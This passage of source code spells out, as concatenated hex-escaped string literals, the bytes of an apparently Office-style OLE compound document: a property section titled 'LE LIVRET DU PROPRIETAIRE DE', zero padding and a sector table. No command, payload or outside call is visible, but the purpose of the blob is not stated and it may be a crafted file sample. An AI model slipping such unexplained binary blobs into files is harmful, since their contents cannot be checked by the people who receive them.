+"\x1e\x00\x00\x00\x05\x00\x00\x00\x2a\x2a\x2a\x2a\x00\x00\x45\x00"
+"\x03\x00\x00\x00\xd1\x00\x00\x00\x03\x00\x00\x00\x3b\x00\x00\x00"
+"\x03\x00\x00\x00\xa4\x73\x00\x00\x03\x00\x00\x00\x41\x0a\x0a\x00"
+"\x0b\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00"
+"\x0b\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00"
+"\x1e\x10\x00\x00\x01\x00\x00\x00\x1d\x00\x00\x00\x4c\x45\x20\x4c"
+"\x49\x56\x52\x45\x54\x20\x44\x55\x20\x50\x52\x4f\x50\x52\x49\x45"
+"\x54\x41\x49\x52\x45\x20\x44\x45\x00\x0c\x10\x00\x00\x02\x00\x00"
+"\x00\x1e\x00\x00\x00\x06\x00\x00\x00\x54\x69\x74\x72\x65\x00\x03"
+"\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7c\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00"
+"\x05\x00\x00\x00\x06\x00\x00\x00\x07\x00\x00\x00\x08\x00\x00\x00"
+"\x09\x00\x00\x00\x0a\x00\x00\x00\x0b\x00\x00\x00\x0c\x00\x00\x00"
+"\x0d\x00\x00\x00\x0e\x00\x00\x00\x0f\x00\x00\x00\x10\x00\x00\x00"
+"\x11\x00\x00\x00\x12\x00\x00\x00\x13\x00\x00\x00\x14\x00\x00\x00"
+"\x15\x00\x00\x00\x16\x00\x00\x00\x17\x00\x00\x00\x18\x00\x00\x00"
+"\x19\x00\x00\x00\x1a\x00\x00\x00\x1b\x00\x00\x00\x1c\x00\x00\x00"
+"\x1d\x00\x00\x00\x1e\x00\x00\x00\x1f\x00\x00\x00\x20\x00\x00\x00"
+"\x21\x00\x00\x00\x22\x00\x00\x00\x23\x00\x00\x00\x24\x00\x00\x00"
+"\x25\x00\x00\x00\x26\x00\x00\x00\x27\x00\x00\x00\x28\x00\x00\x00"
+"\x29\x00\x00\x00\x2a\x00\x00\x00\x2b\x00\x00\x00\x2c\x00\x00\x00"
+"\x2d\x00\x00\x00\x2e\x00\x00\x00\x2f\x00\x00\x00\x30\x00\x00\x00"
+"\x31\x00\x00\x00\x32\x00\x00\x00\x33\x00\x00\x00\x34\x00\x00\x00"
+"\x35\x00\x00\x00\x36\x00\x00\x00\x37\x00\x00\x00\x38\x00\x00\x00"
+"\x39\x00\x00\x00\x3a\x00\x00\x00\x3b\x00\x00\x00\x3c\x00\x00\x00"
+"\x3d\x00\x00\x00\x3e\x00\x00\x00\x3f\x00\x00\x00\x40\x00\x00\x00"
+"\x41\x00\x00\x00\x42\x00\x00\x00\x43\x00\x00\x00\x44\x00\x00\x00"
+"\x45\x00\x00\x00\x46\x00\x00\x00\x47\x00\x00\x00\x48\x00\x00\x00"
+"\x49\x00\x00\x00\x4a\x00\x00\x00\x4b\x00\x00\x00\x4c\x00\x00\x00"
+"\x4d\x00\x00\x00\x4e\x00\x00\x00\x4f\x00\x00\x00\x50\x00\x00\x00"
+"\x51\x00\x00\x00\x52\x00\x00\x00\x53\x00\x00\x00\x54\x00\x00\x00"
+"\x55\x00\x00\x00\x56\x00\x00\x00\x57\x00\x00\x00\x58\x00\x00\x00"
+"\x59\x00\x00\x00\x5a\x00\x00\x00\x5b\x00\x00\x00\x5c\x00\x00\x00"
+"\x5d\x00\x00\x00\x5e\x00\x00\x00\x5f\x00\x00\x00\x60\x00\x00\x00"
+"\x61\x00\x00\x00\x62\x00\x00\x00\x63\x00\x00\x00\x64\x00\x00\x00"
+"\x65\x00\x00\x00\x66\x00\x00\x00\x67\x00\x00\x00\x68\x00\x00\x00"
+"\x69\x00\x00\x00\x6a\x00\x00\x00\x6b\x00\x00\x00\x6c\x00\x00\x00"
+"\x6d\x00\x00\x00\x6e\x00\x00\x00\x6f\x00\x00\x00\x70\x00\x00\x00"
+"\x71\x00\x00\x00\x72\x00\x00\x00\x73\x00\x00\x00\x74\x00\x00\x00"
+"\x75\x00\x00\x00\x76\x00\x00\x00\x77\x00\x00\x00\x78\x00\x00\x00"
+"\x79\x00\x00\x00\x7a\x00\x00\x00\x7b\x00\x00\x00\x7c\x00\x00\x00"
+"\x7d\x00\x00\x00\x7e\x00\x00\x00\x7f\x00\x00\x00\x80\x00\x00\x00"
+"\x81\x00\x00\x00\xfe\xff\xff\xff\x83\x00\x00\x00\x84\x00\x00\x00"
+"\x85\x00\x00\x00\x86\x00\x00\x00\x87\x00\x00\x00\x88\x00\x00\x00"
+"\x89\x00\x00\x00\x8a\x00\x00\x00\x8b\x00\x00\x00\x8c\x00\x00\x00"
+"\x8d\x00\x00\x00\x8e\x00\x00\x00\x8f\x00\x00\x00\x90\x00\x00\x00"
+"\x91\x00\x00\x00\x92\x00\x00\x00\x93\x00\x00\x00\xfe\xff\xff\xff"
+"\x95\x00\x00\x00\x96\x00\x00\x00\x97\x00\x00\x00\x98\x00\x00\x00"
+"\x99\x00\x00\x00\x9a\x00\x00\x00\x9b\x00\x00\x00\x9c\x00\x00\x00"
+"\x9d\x00\x00\x00\x9e\x00\x00\x00\x9f\x00\x00\x00\xa0\x00\x00\x00"
